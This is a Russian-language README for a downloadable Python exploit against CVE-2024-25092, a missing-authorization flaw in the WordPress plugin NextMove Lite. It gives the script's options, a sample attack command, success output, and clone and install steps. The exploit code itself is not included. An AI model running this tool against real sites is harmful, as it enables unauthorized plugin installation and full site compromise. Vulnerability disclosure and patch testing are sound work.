
WordPress плагин NextMove Lite <= 2.17.0 - уязвимость произвольной установки/активации плагина (Subscriber+)
CVE-2024-25092 — это уязвимость высокой степени серьезности, затрагивающая плагин WordPress NextMove Lite (версии <= 2.17.0). Эта уязвимость позволяет пользователю с уровнем доступа subscriber и выше устанавливать и активировать произвольные плагины на сайте WordPress из-за отсутствия проверок авторизации.
Плагин XLPlugins NextMove Lite для WordPress содержит уязвимость отсутствия авторизации, позволяющую аутентифицированным пользователям с правами уровня subscriber и выше выполнять произвольную установку и активацию плагинов. Это может привести к полной компрометации сайта WordPress.
Приведенный Python-скрипт автоматизирует эксплуатацию этой уязвимости, выполняя вход на сайт WordPress и устанавливая указанный плагин.
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-un USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
Password
-pl PLUGIN, --plugin PLUGIN
Plugin to install (default: cart-for-woocommerce)
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin
Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.
requestsКлонируйте репозиторий:
git clone https://github.com/Nxploited/CVE-2024-25092.git
cd CVE-2024-25092
Установите требуемые Python-пакеты:
pip install requests
Этот скрипт предназначен только для образовательных целей. Используйте его ответственно и только на тех системах, для которых у вас есть явное разрешение. Несанкционированное использование этого скрипта противозаконно и неэтично.